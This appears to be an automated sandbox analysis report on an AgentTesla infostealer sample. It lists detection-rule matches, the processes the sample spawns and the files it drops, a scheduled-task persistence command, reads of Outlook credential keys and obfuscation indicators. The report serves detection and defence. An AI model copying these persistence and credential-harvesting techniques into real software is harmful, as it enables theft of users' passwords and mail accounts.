              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0063866u002d9900u002d46A9u002dBAF8u002dC30A0EC83145u007d/u00340AC4BAEu002d6FADu002d49F9u002dADA9u002d9C669FAB2230.csLarge array initialization: .cctor: array initializer size 10995
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 (author = ditekSHen, description = AgentTeslaV3 infostealer payload)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 (author = ditekSHen, description = AgentTeslaV3 infostealer payload)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EC624
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EE918
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 0_2_029EE908
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_02C5FC18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_02C56D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_0692F2E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_06929100
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_0692AEE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_0692E97C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_069225F8
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.345081208.00000000073D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.327264541.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000000.257511638.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000000.315508703.0000000000438000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.524125934.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Binary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nrQtAokXKaSn.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, command line: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Windows\SysWOW64\schtasks.exe, command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, command line: {path}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, command line: {path}
Source: unknown | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe, command line: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Windows\SysWOW64\schtasks.exe, command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe, command line: {path}
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe, command line: {path}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File created: C:\Users\user\AppData\Local\Temp\tmp152E.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/5@8/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538141931.0000000002F45000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.538732210.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Mutant created: \Sessions\1\BaseNamedObjects\OGrkiBVSf
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Cryptographic APIs: 'CreateDecryptor'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File read: C:\Windows\System32\drivers\etc\hosts (5 reads)
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File read: C:\Windows\System32\drivers\etc\hosts (5 reads)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: vaoPXhU.pdb | source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Data Obfuscation

Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | .Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | .Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | .Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: initial sample | Static PE information: section name: .text entropy: 7.457613017086461
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | High entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | High entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | High entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | High entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
